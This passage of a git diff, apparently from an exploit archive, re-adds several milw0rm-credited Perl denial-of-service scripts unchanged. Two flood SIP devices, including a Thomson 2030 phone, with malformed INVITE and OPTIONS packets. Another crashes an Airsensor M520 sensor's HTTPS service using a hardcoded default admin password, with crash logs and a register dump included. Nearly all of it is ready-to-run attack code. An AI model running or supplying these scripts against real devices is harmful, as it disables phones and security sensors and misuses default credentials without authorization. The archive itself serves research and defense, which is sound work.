+$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";
+
+$socket->send($msg);
+
+# milw0rm.com [2007-08-21]
diff --git a/platforms/hardware/dos/4298.pl b/platforms/hardware/dos/4298.pl
index 10b7897c1..f176f99c9 100755
--- a/platforms/hardware/dos/4298.pl
+++ b/platforms/hardware/dos/4298.pl
@@ -1,95 +1,95 @@ -#!/usr/bin/perl - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[3]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - - - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; - -$socket->send($msg); - - - -sleep(8.2); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(1.5); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(3.3); - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 
PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n"; - -$socket->send($msg); - - - -sleep(4); - -$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(4); - -$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(12); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(3); - -$msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; - -$socket->send($msg); - - - -sleep(3); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n"; - 
-$socket->send($msg); - - - -sleep(3); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-08-21] +#!/usr/bin/perl + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[3]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + + + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; + +$socket->send($msg); + + + +sleep(8.2); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(1.5); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(3.3); + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, 
SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n"; + +$socket->send($msg); + + + +sleep(4); + +$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(4); + +$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(12); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(3); + +$msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; + 
+$socket->send($msg);
+
+
+
+sleep(3);
+
+$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n";
+
+$socket->send($msg);
+
+
+
+sleep(3);
+
+$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n";
+
+$socket->send($msg);
+
+# milw0rm.com [2007-08-21]
diff --git a/platforms/hardware/dos/4319.pl b/platforms/hardware/dos/4319.pl
index 121d3f101..787581ed6 100755
--- a/platforms/hardware/dos/4319.pl
+++ b/platforms/hardware/dos/4319.pl
@@ -1,23 +1,23 @@
-#!/usr/bin/perl
-
-#Vulneravility for Thomson 2030 firmware v1.52.1
-
-#It provokes a DoS in the device.
-
-use IO::Socket::INET;
-
-die "Usage $0 " unless ($ARGV[2]);
-
-
-$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
-
- Proto=>'udp',
-
- PeerAddr=>$ARGV[0]);
-
-
-$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";
-
-$socket->send($msg);
-
-# milw0rm.com [2007-08-27]
+#!/usr/bin/perl
+
+#Vulneravility for Thomson 2030 firmware v1.52.1
+
+#It provokes a DoS in the device.
+
+use IO::Socket::INET;
+
+die "Usage $0 " unless ($ARGV[2]);
+
+
+$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
+
+ Proto=>'udp',
+
+ PeerAddr=>$ARGV[0]);
+
+
+$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";
+
+$socket->send($msg);
+
+# milw0rm.com [2007-08-27]
diff --git a/platforms/hardware/dos/4426.pl b/platforms/hardware/dos/4426.pl
index 803d13403..4061fe68d 100755
--- a/platforms/hardware/dos/4426.pl
+++ b/platforms/hardware/dos/4426.pl
@@ -1,156 +1,156 @@ -#!/usr/bin/perl -w -# -# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC -# -# The vulnerability is caused due to an unspecified error in the cgis -# files filter used for configure propierties. This can be exploited by -# sending a specially crafted HTTPS request (necessary authentication), -# which will cause the HTTPS service on the system to crash. -# -# Requisites: "Use DHCP" option interface mark "No" -# -# Examples: -# -# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1 -# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1 -# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1 -# -# Pinging: -# -# Before: -# -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# -# After: -# -# Hardware error. -# Hardware error. -# Hardware error. -# Request timed out. -# Request timed out. -# Request timed out. -# -# C:\>nc -vvn 192.168.100.100 443 -# (UNKNOWN) [192.168.100.100] 443 (?): connection refused -# sent 0, rcvd 0: NOTSOCK -# -# Buffer Overflow debug log: -# -# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520 -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4 -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51 -# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55 -# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction) -# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD -# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump: -# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041 -# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c 
t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494 -# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000 -# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc -# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910 -# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534 -# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534 -# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534 -# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03 -# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000 -# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028 -# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb -# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40 -# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009 -# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000 -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200 -# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074 -# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End: -# -# The vulnerability has been reported in versions Airdefense -# -# Firmware Version 4.3.1.1, Model = M520 -# Firmware version 4.4.1.4, Model = M520 -# -# More information: 
http://www.airdefense.net -# http://support.airdefense.net -# -# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. -# -# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, -# pikah, codebreak, h3llfyr3 -# -# Alex Hernandez ahernandez [at] sybsecurity dot com -# - -use strict; -use LWP; -use Data::Dumper; -require HTTP::Request; -require HTTP::Headers; - -my $string = "%41%41%41"; # Strings to send -my $method = 'GET'; # Method "GET" or "POST" -my $uri = 'https://192.168.100.100'; # Factory default IP address -my $content = "/adLog.cgi?"; # Cgi's file to crash - -#my $content = "/ad.cgi?"; -#my $content = "/post.cgi?"; -#my $content = "/logout.cgi?"; - -my $headers = HTTP::Headers->new( - -'Host:' => '192.168.100.100', -'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', -'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', -'Accept-Language:' => 'en-us,en;q=0.5', -'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', -'Keep-Alive:' => '300', -'Connection:' => 'keep-alive', -'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh', -'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor - -); - -my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); - -my $ua = LWP::UserAgent->new; -my $response = $ua->request($request); - -print "[+] Denial of Service exploit for Airsensor M520 Final\n"; -print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; -print "[+] We got this response from sensor: \n\n" . $response->content . 
"\n"; - -my $data; - foreach my $pair (split('&', $response->content)) { - my ($k, $v) = split('=', $pair); - $data->{$k} = $v; -} - -if ($data->{RESULT} != 0) { - - print "[+] Denial of Service exploit for Airsensor M520 Final\n"; - print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - print "[+] Use:\n"; - print "\tperl -x dos_sensor.pl\n"; - print $data->{RESPMSG} . "\n"; - exit(0); - -} else { - - print "[+] Denial of service Exploit successed!!!\n"; - print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; -} - -# milw0rm.com [2007-09-18] +#!/usr/bin/perl -w +# +# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC +# +# The vulnerability is caused due to an unspecified error in the cgis +# files filter used for configure propierties. This can be exploited by +# sending a specially crafted HTTPS request (necessary authentication), +# which will cause the HTTPS service on the system to crash. +# +# Requisites: "Use DHCP" option interface mark "No" +# +# Examples: +# +# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1 +# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1 +# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1 +# +# Pinging: +# +# Before: +# +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# +# After: +# +# Hardware error. +# Hardware error. +# Hardware error. +# Request timed out. +# Request timed out. +# Request timed out. 
+# +# C:\>nc -vvn 192.168.100.100 443 +# (UNKNOWN) [192.168.100.100] 443 (?): connection refused +# sent 0, rcvd 0: NOTSOCK +# +# Buffer Overflow debug log: +# +# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520 +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4 +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51 +# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55 +# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction) +# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD +# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump: +# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041 +# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494 +# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000 +# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc +# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910 +# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534 +# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534 +# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534 +# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03 +# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000 +# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028 +# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb +# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40 +# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009 +# 
1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000 +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200 +# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074 +# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End: +# +# The vulnerability has been reported in versions Airdefense +# +# Firmware Version 4.3.1.1, Model = M520 +# Firmware version 4.4.1.4, Model = M520 +# +# More information: http://www.airdefense.net +# http://support.airdefense.net +# +# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. 
+# +# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, +# pikah, codebreak, h3llfyr3 +# +# Alex Hernandez ahernandez [at] sybsecurity dot com +# + +use strict; +use LWP; +use Data::Dumper; +require HTTP::Request; +require HTTP::Headers; + +my $string = "%41%41%41"; # Strings to send +my $method = 'GET'; # Method "GET" or "POST" +my $uri = 'https://192.168.100.100'; # Factory default IP address +my $content = "/adLog.cgi?"; # Cgi's file to crash + +#my $content = "/ad.cgi?"; +#my $content = "/post.cgi?"; +#my $content = "/logout.cgi?"; + +my $headers = HTTP::Headers->new( + +'Host:' => '192.168.100.100', +'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', +'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', +'Accept-Language:' => 'en-us,en;q=0.5', +'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', +'Keep-Alive:' => '300', +'Connection:' => 'keep-alive', +'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh', +'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor + +); + +my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); + +my $ua = LWP::UserAgent->new; +my $response = $ua->request($request); + +print "[+] Denial of Service exploit for Airsensor M520 Final\n"; +print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; +print "[+] We got this response from sensor: \n\n" . $response->content . "\n"; + +my $data; + foreach my $pair (split('&', $response->content)) { + my ($k, $v) = split('=', $pair); + $data->{$k} = $v; +} + +if ($data->{RESULT} != 0) { + + print "[+] Denial of Service exploit for Airsensor M520 Final\n"; + print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + print "[+] Use:\n"; + print "\tperl -x dos_sensor.pl\n"; + print $data->{RESPMSG} . 
"\n"; + exit(0); + +} else { + + print "[+] Denial of service Exploit successed!!!\n"; + print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; +} + +# milw0rm.com [2007-09-18] diff --git a/platforms/hardware/dos/4692.pl b/platforms/hardware/dos/4692.pl index 4e460a7d5..c93337fc1 100755 --- a/platforms/hardware/dos/4692.pl +++ b/platforms/hardware/dos/4692.pl 
